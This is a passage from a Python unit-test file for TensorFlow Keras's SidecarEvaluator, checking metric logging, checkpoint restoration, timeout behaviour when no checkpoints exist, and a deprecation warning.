sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1,
callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir)])
with self.assertLogs() as cm:
sidecar_evaluator.start()
metrics_logging = [
line for line in cm.output if 'End of evaluation' in line
]
self.assertLen(metrics_logging, 1)
expected_logged_metrics = [
'loss', 'categorical_accuracy', 'mean_squared_error_1',
'mean_squared_error_2'
]
for metric_name in expected_logged_metrics:
self.assertRegex(metrics_logging[0], f'{metric_name}=')
# Eval model has been restored to the same state as the original model, so
# their weights should match. If not, restoration of the model didn't
# work.
self.assertModelsSameVariables(model, eval_model)
# check the iterations is restored.
self.assertEqual(sidecar_evaluator._iterations.numpy(), _BATCH_SIZE)
self.assertSummaryEventsWritten(os.path.join(log_dir, 'validation'))
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testTimeoutFunction(self, model_type, build_model):
checkpoint_dir = os.path.join(self.get_temp_dir(), 'checkpoints')
# Create a model with synthetic data, and fit for one epoch.
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(_BATCH_SIZE)
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have a sidecar_evaluator evaluate once.
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1)
with self.assertLogs() as cm:
threading.Thread(target=sidecar_evaluator.start, daemon=True).start()
time.sleep(50)
metrics_logging = [
l for l in cm.output if 'No checkpoints appear to be found' in l
]
self.assertGreaterEqual(len(metrics_logging), 1)
def testExperimentalDeprecatedMessage(self):
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
sidecar_evaluator_lib.SidecarEvaluatorExperimental(None, None, None)
warning_msg = ('`tf.keras.experimental.SidecarEvaluator` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
if __name__ == '__main__':
tf.compat.v1.enable_v2_behavior()
tf.test.main()
|